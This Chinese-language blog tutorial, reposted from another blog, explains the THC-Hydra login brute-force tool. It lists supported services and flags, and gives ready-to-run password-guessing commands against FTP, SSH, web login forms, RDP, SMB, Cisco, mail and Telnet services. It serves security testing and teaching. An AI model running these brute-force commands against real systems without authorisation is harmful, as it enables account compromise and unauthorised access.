THC-HYDRA是一個支持多種網絡服務的非常快速的網絡登陸破解工具。這個工具是一個驗證性質的工具,它被設計的主要目的是爲研究人員和安全從業人員展示遠程獲取一個系統的認證權限是比較容易的!
目前支持破解的服務:
AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP. For HTTP, POP3, IMAP and SMTP, several login mechanisms like plain and MD5 digest etc. are supported.
使用說明:
-R 繼續從上一次進度接着破解
-S 採用SSL鏈接(大寫的S)
-s PORT 如果非默認端口,可通過這個參數指定
-l LOGIN 小寫,用於指定破解的用戶,對特定用戶破解
-L FILE 大寫,用於指定用戶的用戶名字典
-p PASS 小寫,用於指定密碼破解,少用,一般是採用密碼字典
-P FILE 大寫,用於指定密碼字典
-e ns 額外的選項,n:空密碼試探,s:使用指定賬戶和密碼試探
-C FILE 使用冒號分割格式 例如 "登錄名:密碼"來代替-L/-P參數
-M FILE 指定目標列表文件一行一條
-o FILE 指定結果輸出文件
-f 找到第一對登錄名或者密碼的時候中止破解
-t TASKS 同時運行的線程數,默認爲16
-w TIME 設置最大超時的時間,單位秒,默認是30s
-v / -V 顯示詳細過程
server 目標ip
service 指定服務名,支持的服務跟協議有: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp
HYDRA_PROXY_HTTP 變量參數可以用來定義代理服務器(只能使用http代理)
語法:
HYDRA_PROXY_HTTP="http://ip:port/"
HYDRA_PROXY_CONNECT=ip:8000
如果你使用的代理需要用戶名和密碼,請使用HYDRA_PROXY_AUTH 變量參數:
HYDRA_PROXY_AUTH="the_login:the_password"
1.破解ftp
hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認16) -vV
hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV
2.get方式提交 破解web登錄
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /web/
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get /web/index.asp
3.破解ssh
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip ssh2
hydra -l 用戶名 -p 密碼字典 -t 線程 -o save.log -vV ip ssh2
4.破解teamspeak
hydra -l 用戶名 -P 密碼字典 -s 端口號 -vV ip teamspeak
5.post方式提交 破解web登錄
hydra -l 用戶名 -P 密碼字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
6.cisco
hydra -P pass.txt 192.168.1.229 cisco
hydra -m cloud -P pass.txt 192.168.1.229 cisco-enable
7.smb
hydra -l administrator -P pass.txt 192.168.0.141 smb
8.pop3
hydra -l muts -P pass.txt my.pop3.mail pop3
9.https
hydra -m /index.php -l muts -P pass.txt 192.168.0.12 https
10.rdp
hydra ip rdp -l administrator -P pass.txt -V
11.http-proxy
hydra -l admin -P pass.txt http-proxy://192.168.0.1
12.imap
hydra -L user.txt -p secret 192.168.0.1 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
13.telnet
hydra ip telnet -l 用戶 -P 密碼字典 -t 32 -s 23 -e ns -f -V
附上幾個視頻教程:
hydra ssh password Crack SSH破解教程
hydra http-get web password Crack WEB破解教程
軟件下載地址:
Hydra 7.3官方網站
Hydra 7.3 Linux版本
Hydra 7.3 Windows版本
Hydra 7.3 源碼下載
轉載自:小馬's Blog http://www.i0day.com